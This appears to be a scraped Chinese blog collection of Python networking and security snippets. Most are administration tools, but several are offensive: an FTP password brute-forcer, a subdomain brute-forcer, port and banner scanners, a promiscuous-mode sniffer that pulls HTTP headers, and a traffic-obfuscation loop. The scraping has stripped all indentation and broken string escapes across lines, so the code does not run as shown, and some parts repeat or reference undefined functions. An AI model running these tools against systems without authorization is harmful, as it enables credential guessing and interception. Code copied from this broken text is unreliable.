for root, dirs, files in os.walk(script_path, topdown=False):
for fi in files:
dfile = os.path.join(root, fi)
if dfile.endswith(script_type):
final_files.append(dfile.replace("\","/"))
print("[+] 共找到了 {} 个PHP文件".format(len(final_files)))
return final_files
def scanner(files_list,func):
for item in files_list:
fp = open(item, "r",encoding="utf-8")
data = fp.readlines()
for line in data:
Code_line = data.index(line) + 1
Now_code = line.strip("
")
#for unsafe in ["system", "insert", "include", "eval","select *"]:
for unsafe in [func]:
flag = re.findall(unsafe, Now_code)
if len(flag) != 0:
print("函数: {} ---> 函数所在行: {} ---> 路径: {} " .
format(flag,Code_line,item))
if __name__ == "__main__":
path = sys.argv[1]
func = sys.argv[2]
ret = spider(path,".php")
scanner(ret,func)
SQL执行语句监控: 通过日志文件,监控MySQL数据库执行的SQL语句,需要开启数据库SET GLOBAL general_log='ON'; set global general_log_file='C:mysql.log'
这两个选项才能够实现监控数据的目的.
import re
try:
fp = open("C:/mysql.log","r")
sql = fp.readlines()
for item in sql:
temp = item.replace("
","").split(' ')
if re.search("Connect",temp[1]) == None and temp[2] != "":
print("状态:{} ---> 执行语句: {}".format(temp[1],temp[2]))
open("C:/mysql.log","w")
except Exception:
open("C:/mysql.log", "w")
exit()
简单实现端口扫描
import socket
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk.settimeout(1)
for ip in range(0,254):
try:
sk.connect(("192.168.1."+str(ip),443))
print("192.168.1.%d server open
"%ip)
except Exception:
print("192.168.1.%d server not open"%ip)
sk.close()
第二种简单的实现端口扫描.
import socket
def PortScan(ip, port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip, port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip, port))
finally:
server.close()
if __name__ == '__main__':
host = '192.168.1.1'
for port in range(50, 1000):
PortScan(host, port)
import socket
port_number = [135,443,80]
for index in port_number:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', index))
if result == 0:
print("Port %d is open" % index)
else:
print("Port %d is not open" % index)
sock.close()
当然上面这两种方式都是串行执行的,这在多IP多端口的情况下是非常慢得,所以引入多线程threading模块
import threading
import socket
def PortScan(ip, port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip, port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip, port))
finally:
server.close()
if __name__ == '__main__':
host = '192.168.1.1'
threads = []
for port in range(20, 100):
t = threading.Thread(target=PortScan, args=(host, port))
t.start()
threads.append(t)
for t in threads:
t.join()
简单实现批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
ret = subprocess.call("ping -w 500 -n 1 %s" %ip,stdout=subprocess.PIPE,shell=True)
if ret == 0:
hproc = subprocess.getoutput("ping "+ip)
ping = hproc.split("平均 = ")[1]
print("延时: {} 主机: {}".format(ping,ip))
else:
print("延时: {} 主机: {}".format("None", ip))
if __name__ == "__main__":
with open("ip.log","r") as f:
for i in f:
p = multiprocessing.Process(target=ping,args=(i,))
p.start()
获取目标网页容器信息
import os
import requests
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def GetTitle(domain):
try:
url="https://{}".format(domain)
ret = requests.get(url=url,headers=head,timeout=1)
title = re.findall("<title>.*</title>",ret.content.decode("utf-8"))
print("页面标题:{}".format(str(title[0]).replace("<title>","").replace("</title>","")))
print("主机时间:{}".format(str(ret.headers["Date"])))
print("主机容器:{}".format(ret.headers["Server"]))
print("压缩技术:{}".format(ret.headers["Content-Encoding"]))
print("Cxy_all:{}".format(ret.headers["Cxy_all"]))
print("Traceid:{}".format(ret.headers["Traceid"]))
except:
pass
if __name__ == "__main__":
GetTitle("baidu.cn")
获取目标网站IP地址
import os
import socket
import re
def GetIPAddress(domain):
try:
sock = socket.getaddrinfo(domain,None)
ip = str(sock[0][4])
result = re.findall("(?:[0-9]{1,3}.){3}[0-9]{1,3}", ip)
print(result[0])
except:
pass
if __name__ == "__main__":
GetIPAddress("www.163.com")
子域名爆破: 用于爆破网站中的一级域名,例如www等格式的域名.
import os
import requests
import linecache
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def VisitWeb(prefix,domain):
try:
url = "https://{}.{}".format(prefix,domain)
ret = requests.get(url=url, headers=head, timeout=1)
if(ret.status_code == 200):
return 1
else:
return 0
except:
return 0
def BlastWeb(domain,wordlist):
forlen = len(linecache.getlines(wordlist))
fp = open(wordlist,"r+")
for i in range(0,forlen):
main = str(fp.readline().split()[0])
if VisitWeb(main, domain) != 0:
print("旁站: {}.{} 存在".format(main,domain))
if __name__ == "__main__":
BlastWeb("baidu.com","./list.log")
FTP密码爆破工具 可自行加上多线程支持,提高速度..
import ftplib
def Brutelogin(hostname,username,wordlist):
fp = open(wordlist,"r+")
for line in fp.readlines():
password = line.strip("
").strip("
")
print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print("
[*] {} Login Succeeded.".format(password))
except:
pass
print("
[-] Could not brubrute force FTP credentials.")
return(None,None)
Brutelogin("192.168.1.20","admin","./list.log")
简单实现百度爬取
import sys,os,re
import requests
from bs4 import BeautifulSoup
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"}
#url = "https://www.baidu.com/s?wd=lyshark&pn=0"
url = "http://192.168.1.2/bd/"
ret = requests.get(url=url,headers=head)
soup = BeautifulSoup(ret.content,'lxml')
urls = soup.find_all(name='a',attrs={'data-click':re.compile(('.')),'class':None})
for item in urls:
get_url = requests.get(url=item['href'],headers=head,timeout=5)
if get_url.status_code == 200:
print(get_url.url)
实现动态进度条
import time,ctypes
def process_bar(percent, end_str=''):
bar = int(percent)
bar = '
' + '[ {:0>0d} | '.format(percent) + end_str + " ]"
print(bar, end='', flush=True)
for i in range(101):
time.sleep(0.1)
end_str = '100'
process_bar(i, end_str=end_str)
获取目标网页容器信息
import os
import requests
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def GetTitle(domain):
try:
url="https://{}".format(domain)
ret = requests.get(url=url,headers=head,timeout=1)
title = re.findall("<title>.*</title>",ret.content.decode("utf-8"))
print("页面标题:{}".format(str(title[0]).replace("<title>","").replace("</title>","")))
print("主机时间:{}".format(str(ret.headers["Date"])))
print("主机容器:{}".format(ret.headers["Server"]))
print("压缩技术:{}".format(ret.headers["Content-Encoding"]))
print("Cxy_all:{}".format(ret.headers["Cxy_all"]))
print("Traceid:{}".format(ret.headers["Traceid"]))
except:
pass
if __name__ == "__main__":
GetTitle("baidu.cn")
获取目标网站IP地址
import os
import socket
import re
def GetIPAddress(domain):
try:
sock = socket.getaddrinfo(domain,None)
ip = str(sock[0][4])
result = re.findall("(?:[0-9]{1,3}.){3}[0-9]{1,3}", ip)
print(result[0])
except:
pass
if __name__ == "__main__":
GetIPAddress("www.163.com")
FTP密码爆破工具 可自行加上多线程支持,提高速度..
import ftplib
def Brutelogin(hostname,username,wordlist):
fp = open(wordlist,"r+")
for line in fp.readlines():
password = line.strip("
").strip("
")
print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print("
[*] {} Login Succeeded.".format(password))
except:
pass
print("
[-] Could not brubrute force FTP credentials.")
return(None,None)
Brutelogin("192.168.1.20","admin","./list.log")
简单实现批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
ret = subprocess.call("ping -w 500 -n 1 %s" %ip,stdout=subprocess.PIPE,shell=True)
if ret == 0:
hproc = subprocess.getoutput("ping "+ip)
ping = hproc.split("平均 = ")[1]
print("延时: {} 主机: {}".format(ping,ip))
else:
print("延时: {} 主机: {}".format("None", ip))
if __name__ == "__main__":
with open("ip.log","r") as f:
for i in f:
p = multiprocessing.Process(target=ping,args=(i,))
p.start()
扫描目标主机 Banner: 为了让函数获得完整的屏幕控制权,这里使用一个信号量,它能够阻止其他线程运行而避免出现多线程同时输出造成的乱码和失序等情况.
#coding=utf-8
from socket import *
from threading import *
#定义一个信号量
screenLock = Semaphore(value=1)
def ScanBanner(addr,port):
try:
conn = socket(AF_INET,SOCK_STREAM)
conn.connect((addr,port))
conn.send(bytes("hello lyshark
",encoding="utf-8"))
res = conn.recv(200)
# 加锁
screenLock.acquire()
print("[+] 主机: {} Banner: {}".format(addr,res))
except Exception:
# 加锁
screenLock.acquire()
print("[-] 主机: {} 不存在或已经关闭.".format(addr))
pass
finally:
# 执行释放锁的操作
screenLock.release()
conn.close()
setdefaulttimeout(1)
for i in range(0,25):
a = "192.168.1.{}".format(i)
t = Thread(target=ScanBanner,args=(a,80))
t.start()
scapy实现ping
from scapy.all import *
from random import randint
import ipaddress,threading
def ping(host):
RandomID=randint(1,65534)
packet = IP(dst=host, ttl=64, id=RandomID) / ICMP(id=RandomID, seq=RandomID) / b"lyshark"
respon = sr1(packet,timeout=3)
if respon:
print(str(respon[IP].src))
if __name__=='__main__':
threads = []
net = ipaddress.ip_network("192.168.1.0/24")
for item in net:
threads.append(ping(item))
print(threads)
web容器识别
import re,requests
from bs4 import BeautifulSoup
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}
def GetServerTitle(url):
Respon = requests.get(url=url,headers=header,timeout=5)
print("--" * 50)
print(url + " ",end="")
if Respon.status_code == 200:
RequestBody = [item for item in Respon.headers]
for item in ["Date","Server","X-Powered-By"]:
if item in RequestBody:
print(Respon.headers[item] + " ",end="")
else:
print("None" + " ",end="")
bs4 = BeautifulSoup(Respon.text,"html.parser")
print(bs4.find_all("title")[0])
print("--" * 50)
for i in range(1,10):
GetServerTitle("http://www.xxx.com")
多线程执行SSH的两种方式
import paramiko,datetime,threading
class MyThread(threading.Thread):
def __init__(self,address,username,password,port,command):
super(MyThread, self).__init__()
self.address = address
self.username = username
self.password = password
self.port = port
self.command = command
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
stdin, stdout, stderr = ssh.exec_command(self.command)
result = stdout.read()
if not result:
self.result = stderr.read()
ssh.close()
self.result = result.decode()
except Exception:
self.result = "0"
def get_result(self):
try:
return self.result
except Exception:
return None
ThreadPool = [] # 定义线程池
starttime = datetime.datetime.now()
for item in range(5):
obj = MyThread("192.168.1.20","root","123","22","ifconfig")
ThreadPool.append(obj)
for item in ThreadPool:
item.start() # 启动线程
item.join()
for item in ThreadPool:
ret = item.get_result() # 获取返回结果
print(ret)
endtime = datetime.datetime.now()
print("程序开始运行:{} 结束:{}".format(starttime,endtime))
第二种方式
import paramiko,datetime,threading
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_shell(address,username,password,port,command):
try:
ssh.connect(address,port=port,username=username,password=password,timeout=1)
stdin, stdout, stderr = ssh.exec_command(command)
result = stdout.read()
if not result:
result=stderr.read()
ssh.close()
return result.decode()
except Exception:
return "0"
class MyThread(threading.Thread):
def __init__(self,func,args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
ThreadPool = [] # 定义线程池
starttime = datetime.datetime.now()
for item in range(10):
obj = MyThread(func=ssh_shell,args=("192.168.1.20","root","123","22","pwd"))
ThreadPool.append(obj)
for item in ThreadPool:
item.start()
item.join()
for item in ThreadPool:
ret = item.get_result() # 获取返回结果
print(ret)
endtime = datetime.datetime.now()
print("程序开始运行:{} 结束:{}".format(starttime,endtime))
web页面探测工具 探测页面健康状态
import pycurl,certifi
from io import BytesIO
headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']
def header_function(header_line):
header_line = header_line.decode("utf-8")
#print(header_line.split(":"))
class ex_response(object):
def __init__(self,url):
self.buffer = BytesIO() # 创建缓存对象
self.c = pycurl.Curl() # 创建curl实例
self.c.setopt(pycurl.URL,url) # 设置资源路径
self.c.setopt(pycurl.CAINFO,certifi.where()) # 设置指定证书验证包
self.c.setopt(pycurl.WRITEDATA, self.buffer)
self.c.setopt(pycurl.WRITEHEADER,self.buffer)
self.c.setopt(self.c.HTTPHEADER,headers) # 设置HTTP头
self.c.setopt(pycurl.HEADERFUNCTION, header_function) # 调用外部函数
try:
self.c.perform()
except Exception:
self.buffer.close()
self.c.close()
def getinfo(self):
h1 = self.c.getinfo(pycurl.HTTP_CODE) # 状态码
h2 = self.c.getinfo(pycurl.TOTAL_TIME) # 传输结束总消耗时间
h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME) # DNS解析时间
h4 = self.c.getinfo(pycurl.CONNECT_TIME) # 建立连接时间
h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME) # 建立连接到准备传输消耗时间
h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) # 从建立连接到传输开始消耗时间
h7 = self.c.getinfo(pycurl.REDIRECT_TIME) # 重定向消耗时间
h8 = self.c.getinfo(pycurl.SIZE_UPLOAD) # 上传数据包大小
h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD) # 下载数据包大小
h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD) # 平均下载速度
h11 = self.c.getinfo(pycurl.SPEED_UPLOAD) # 平均上传速度
h12 = self.c.getinfo(pycurl.HEADER_SIZE) # http头文件大小
info ='''
http状态码:%s
传输结束总时间:%.2f ms
DNS解析时间:%.2f ms
建立连接时间:%.2f ms
准备传输时间:%.2f ms
传输开始时间:%.2f ms
重定向时间:%.2f ms
上传数据包大小:%d bytes/s
下载数据包大小:%d bytes/s
平均下载速度:%d bytes/s
平均上传速度:%d bytes/s
http头文件大小:%d byte
''' %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
print(info)
self.buffer.close()
self.c.close()
if __name__ == "__main__":
curl_respon = ex_response("https://www.baidu.com")
curl_respon.getinfo()
内网流量混淆
import requests
import random
import time
import threading
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120'}
url = [
"https://www.baidu.com",
"https://voice.baidu.com/act/newpneumonia/newpneumonia/",
"https://http://news.baidu.com/",
"https://tieba.baidu.com/",
"https://map.baidu.com/",
"https://im.qq.com/"
]
def tstart():
while True:
try:
u = random.choice(url)
Respon = requests.get(url=u,headers=header,timeout=1)
if Respon.status_code == 200:
print("{} ok".format(u))
else:
print("{} error".format(u))
except Exception:
pass
t = threading.Thread(target=tstart)
t.start()
t1 = threading.Thread(target=tstart)
t1.start()
t2 = threading.Thread(target=tstart)
t2.start()
psutils 使用该模块完成遍历。
import psutil
# 获取到网卡的出口入口流量信息
def GetNetwork():
network = psutil.net_io_counters(pernic=True,nowrap=True)
for each in network.keys():
print("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s"
%(each,network[each].bytes_sent,network[each].bytes_recv,
network[each].packets_sent,network[each].packets_recv))
# 获取到当前电脑中的网络连接状态: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
network = psutil.net_connections(kind="tcp")
AllowData = []
for each in network:
src_addr,src_port = each.laddr.ip,each.laddr.port
src_stats = each.status
src_pid = each.pid
if src_stats in ["ESTABLISHED","LISTEN"]:
process = psutil.Process(src_pid)
print("[+] IP地址: %15s:%-5s PID: %5s 名称: %-10s"
%(src_addr,src_port,src_pid,process.name()))
AllowData.append([process.name(),src_port])
return AllowData
# 遍历整个系统中所有进程PID并取出关键数据
def GetProcessID():
for each in psutil.pids():
p = psutil.Process(int(each))
print("-" * 100)
print("进程: %25s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s"
%(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
print("-" * 100)
print("CPU时间信息: {}".format(p.cpu_times()))
print("MEM内存信息: {}".format(p.memory_info()))
print("进程IO读写参数: {}".format(p.io_counters()))
print("进程对外SOCKET: {}".format(p.connections()))
print("
"*100)
以下代码是从网上爬的,收藏了。
In [25]: import psutil
In [26]: from pprint import pprint as pp
#根据进程名查看系统中的进程名与pid
In [27]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'python
...: ' in p.info['name']])
[{'name': 'ipython3', 'pid': 2429}]
In [28]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'mysql'
...: in p.info['name']])
[{'name': 'mysqld_safe', 'pid': 987}, {'name': 'mysqld', 'pid': 1265}]
#所有用户进程
In [32]: import getpass
In [33]: pp([(p.pid,p.info['name']) for p in psutil.process_iter(attrs=['name','u
...: sername']) if p.info['username'] == getpass.getuser()])
[(1, 'systemd'),
(2, 'kthreadd'),
(3, 'ksoftirqd/0'),
(5, 'kworker/0:0H'),
(6, 'kworker/u256:0'),
...
(5004, 'kworker/0:0')]
#查看积极运行的进程:
In [37]: pp([(p.pid,p.info) for p in psutil.process_iter(attrs=['name','status'])
...: if p.info['status'] == psutil.STATUS_RUNNING])
[(2429, {'name': 'ipython3', 'status': 'running'})]
#使用日志文件的进程
In [38]: import os,psutil
In [39]: for p in psutil.process_iter(attrs=['name','open_files']):
...: for file in p.info['open_files'] or []:
...: if os.path.splitext(file.path)[1] == '.log':
...: print("%-5s %-10s %s" % (p.pid,p.info['name'][:10],file.path
...: ))
...:
auditd /var/log/audit/audit.log
vmtoolsd /var/log/vmware-vmsvc.log
tuned /var/log/tuned/tuned.log
#消耗超过5M内存的进程:
In [42]: pp([(p.pid,p.info['name'],p.info['memory_info'].rss) for p in psutil.pro
...: cess_iter(attrs=['name','memory_info']) if p.info['memory_info'].rss > 5
...: * 1024 * 1024])
[(1, 'systemd', 7118848),
(411, 'systemd-udevd', 6254592),
(712, 'polkitd', 13553664),
(716, 'abrtd', 5734400),
(724, 'VGAuthService', 6262784),
(725, 'vmtoolsd', 6426624),
(974, 'tuned', 19648512),
(1265, 'mysqld', 45268992),
(2204, 'sshd', 5726208),
(2429, 'ipython3', 37232640)]
#消耗量最大的3个进程
In [43]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: memory_percent']), key=lambda p: p.info['memory_percent'])][-3:])
[(974, {'memory_percent': 0.9451434561080659, 'name': 'tuned'}),
(2429, {'memory_percent': 1.7909847854955845, 'name': 'ipython3'}),
(1265, {'memory_percent': 2.177553778800572, 'name': 'mysqld'})]
#消耗最多CPU时间的前3个进程
In [44]: pp([(p.pid, p.info['name'], sum(p.info['cpu_times'])) for p in sorted(ps
...: util.process_iter(attrs=['name', 'cpu_times']), key=lambda p: sum(p.info
...: ['cpu_times'][:2]))][-3:])
[(1265, 'mysqld', 13.93),
(2429, 'ipython3', 14.809999999999999),
(725, 'vmtoolsd', 16.74)]
#导致最多I/O的前3个进程
In [45]: pp([(p.pid, p.info['name']) for p in sorted(psutil.process_iter(attrs=['
...: name', 'io_counters']), key=lambda p: p.info['io_counters'] and p.info['
...: io_counters'][:2])][-3:])
[(2429, 'ipython3'), (725, 'vmtoolsd'), (1, 'systemd')]
#前3个进程打开最多的文件描述符:
In [46]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: num_fds']), key=lambda p: p.info['num_fds'])][-3:])
[(377, {'name': 'systemd-journald', 'num_fds': 24}),
(1, {'name': 'systemd', 'num_fds': 43}),
(1307, {'name': 'master', 'num_fds': 91})]
watchdog 文件目录实时 监控文件变化。
from watchdog.observers import Observer
from watchdog.events import *
import time
class FileEventHandler(FileSystemEventHandler):
def __init__(self):
FileSystemEventHandler.__init__(self)
def on_moved(self, event):
if event.is_directory:
print("目录 {0} 更改为 {1}".format(event.src_path,event.dest_path))
else:
print("文件 {0} 更改为 {1}".format(event.src_path,event.dest_path))
def on_created(self, event):
if event.is_directory:
print("目录被创建:{0}".format(event.src_path))
else:
print("文件被创建:{0}".format(event.src_path))
def on_deleted(self, event):
if event.is_directory:
print("目录被删除:{0}".format(event.src_path))
else:
print("文件被删除:{0}".format(event.src_path))
def on_modified(self, event):
if event.is_directory:
print("目录被更改:{0}".format(event.src_path))
else:
print("文件被更改:{0}".format(event.src_path))
if __name__ == "__main__":
observer = Observer()
event_handler = FileEventHandler()
observer.schedule(event_handler,"Z:MyWeb",True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
python HTTP/HTTPS 代理转发
from wsgiref.simple_server import make_server
import requests
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
rHost = environ["HTTP_HOST"]
sub = rHost.split(".")[0]
if sub == "lyshark":
response = requests.get(url="http://www.baidu.com",timeout=10)
by = bytes(response.text,encoding="utf-8")
# HTTP_USER_AGENT
# REQUEST_METHOD
# PATH_INFO
return [by,]
response = b"<b> 404 not found </b>"
return [response,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
print("[*] 服务已启动 0.0.0.0:80")
httpd.serve_forever()
稍微改一改,变成负载均衡,作孽啊。
from wsgiref.simple_server import make_server
import requests,random
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
rHost = environ["HTTP_HOST"]
sub = rHost.split(".")[0]
a = ["http://192.168.1.10","http://192.168.1.20"]
print(rHost,sub)
response = requests.post(url=random.choice(a),timeout=10)
by = bytes(response.text,encoding="utf-8")
return [by,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
httpd.serve_forever()
python 解码IP层 混杂模式,抓包,解码自己搞吧。
import os,socket,struct
from ctypes import *
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_protocol)
sniffer.bind(("192.168.1.2",0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
print(raw_buffer.decode('utf-8','ignore'))
强大的过滤系统
import os,socket,struct
from ctypes import *
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_protocol)
sniffer.bind(("192.168.1.2",0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
string = str(raw_buffer.decode('utf-8','ignore')).splitlines()
for each,item in zip(string,range(0,len(string))):
if each.find('Host') >= 0:
print("------------------------------------------------------------")
print(each)
elif each.find('Referer') >=0:
print(each)
elif each.find('Accept') >=0:
print(each)
列表生成式
'''
aa = [x for x in os.listdir(di) if os.path.splitext(x)[1] == ".png"]
pen = []
print(aa)
for i in aa:
dd = di+i
print("[+] dirname: {} {}".format(dd,os.stat(dd).st_size))
pen.append(os.stat(dd).st_size)
print(pen)
'''
python web 服务器本质: jinja.html
<body>
<h1>{{name}}</h1>
<ul>
{% for item in user_list %}
<li>{{item}}</li>
{% endfor %}
</ul>
</body>
main.py
from wsgiref.simple_server import make_server
from jinja2 import Template
def index():
with open("./index.html","r",encoding="utf-8")as fp:
recv = fp.read()
return recv.encode("utf-8")
def jinja():
with open("./jinja.html","r",encoding="utf-8")as fp:
data = fp.read()
template = Template(data)
recv = template.render(name='John Doe', user_list=['alex', 'eric'])
return recv.encode("utf-8")
url_func = [
('/index/',index),('/jinja/',jinja)]
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
url = environ["PATH_INFO"]
rAddr = environ["REMOTE_ADDR"]
rHost = environ["HTTP_HOST"]
print("[+] 根域名: {} 路径: {} 目标IP: {}".format(rHost,url,rAddr))
func = None
for i in url_func:
if i[0] == url:
func = i[1]
break
if func:
response = func()
else:
response = b"<b> 404 not found </b>"
return [response,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
print("[*] 服务已启动 0.0.0.0:80")
httpd.serve_forever()
运行后,访问魔板页面,完成页面渲染。
python 打包 执行 python setup.py build
import sys
from cx_Freeze import setup, Executable
base = None
if sys.platform == "win32":
base = "Win32GUI"
setup( name = "MyApp",
version = "0.1",
description = "My python",
executables = [Executable("daili.py", base=base)]
)
动态进度: 改版后,可实现msf同款效果。
import time,random
def DynamicBar(scale,sleep):
for item in range(scale+1):
StartProgress = item * "#"
EndProgress = (scale-item) * "."
Count = (item/scale) * 100
dur = time.perf_counter()
print("
{:^3.0f}%[ {}->{} ]{:.2f}s".format(Count, StartProgress, EndProgress, dur), end="")
time.sleep(1)
if __name__ == "__main__":
os.system("cls")
banner = '''
__ __ __
/ | / | / |
$$ | __ __ _______ $$ |____ ______ ______ $$ | __
$$ |/ | / | / |$$ / / $$ | / |
$$ |$$ | $$ |/$$$$$$$/ $$$$$$$ | $$$$$$ |/$$$$$$ |$$ |_/$$/
$$ |$$ | $$ |$$ $$ | $$ | / $$ |$$ | $$/ $$ $$<
$$ |$$ \__$$ | $$$$$$ |$$ | $$ |/$$$$$$$ |$$ | $$$$$$
$$ |$$ $$ |/ $$/ $$ | $$ |$$ $$ |$$ | $$ | $$ |
$$/ $$$$$$$ |$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$/ $$/
/ \__$$ |
$$ $$/
$$$$$$/
'''
print(banner)
DynamicString("hello lyshark this is a test case wwa sdfw rtis aos")
图片转为字符图片:
from PIL import Image
def get_char(r,g,b,alpha = 256):
ascii_char = list("~!@#$%^&*()_+ ")
if alpha == 0:
return " "
length = len(ascii_char)
gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
unit = (256.0 + 1)/length
return ascii_char[int(gray/unit)]
if __name__ == "__main__":
if args.file != None:
img = Image.open(args.file)
img = img.resize((args.width,args.height), Image.NEAREST)
txt = ""
for row in range(args.height):
for cow in range(args.width):
txt += get_char(*img.getpixel((cow,row)))
txt += "
"
print(txt)
Python 实现的自动化服务器管理
import sys
import os
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_cmd(user,passwd,port,userfile,cmd):
check_ok=[]
check_er=[]
file = open(userfile, "r")
line = file.readlines()
file.close()
for i in range(len(line)):
print("-------------------------------------------->" + line[i].strip('
') + "<--------------------------------------------
" )
try:
ssh.connect(hostname=line[i].strip('
'),port=port,username=user,password=passwd)
cmd=cmd
stdin, stdout, stderr = ssh.exec_command(cmd)
result = stdout.read()
if not result:
result=stderr.read()
ssh.close()
print(result.decode())
check_ok.append(line[i].strip('
'))
except Exception:
check_er.append(line[i].strip('
'))
continue
print("
--------------------------------------------------------------------------------------------------------")
print("主机IP 端口 命令 状态 ")
print("--------------------------------------------------------------------------------------------------------")
for i in range(len(check_ok)):
print(check_ok[i] + " "+port+" "+cmd+" [完成]")
for i in range(len(check_er)):
print(check_er[i] + " "+ port +" "+ cmd +" [失败]")
print("--------------------------------------------------------------------------------------------------------")
def ssh_put(user,passwd,source,target):
check_ok=[]
check_er=[]
file=open("./ip.txt","r")
line=file.readlines()
file.close()
for i in range(len(line)):
print("============================================>" + line[i].strip('
') + "<============================================" )
try:
transport = paramiko.Transport((line[i].strip('
'), 22))
transport.connect(username=user, password=passwd)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.put(source, target)
check_ok.append(line[i].strip('
'))
except Exception:
check_er.append(line[i].strip('
'))
continue
print("
--------------------------------------------------------------------------------------------------------")
print("主机IP 端口 传输源 传输到 状态
")
print("--------------------------------------------------------------------------------------------------------")
for i in range(len(check_ok)):
print(check_ok[i] + " " + "22" + " " + source + " " + target + " " + "[完成]")
for i in range(len(check_er)):
print(check_er[i] + " " + "22" + " " + source + " " + target + " " + "[失败]")
print("--------------------------------------------------------------------------------------------------------")
while True:
try:
shell=str(input("[Shell] # "))
if (shell == ""):
continue
elif (shell == "exit"):
exit()
elif (shell == "put"):
ssh_put("root","123123","./a.py","/root/a.py")
elif (shell =="cron"):
temp=input("输入一个计划任务: ")
temp1="(crontab -l; echo "+ temp + ") |crontab"
ssh_cmd("root","123123","22","./user_ip.conf",temp1)
elif (shell == "uncron"):
temp=input("输入要删除的计划任务: ")
temp1="crontab -l | grep -v " "+ temp + "|crontab"
ssh_cmd("root","123123","22","./user_ip.conf",temp1)
else:
ssh_cmd("lyshark","123123","22","./user_ip.conf",shell)
except Exception:
continue
统计access日志: 残废版。
import os,sys,re
lis = {}
ls = []
with open("c://access.log","r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
if data >="11/Apr/2020:07:03:56" and data <= "17/Mar/2020:14:16:25":
t = each.split("(")[1]
t1 = re.sub(";.*$|)|(","",t)
ls.append(t1)
except Exception:
pass
list_count = []
list_num = set(ls)
for item in list_num:
num = ls.count(item)
lis[item] = num
print(lis)
erdai
import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
Agent = []
with open(log_name,"r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
print(data.split(":")[0])
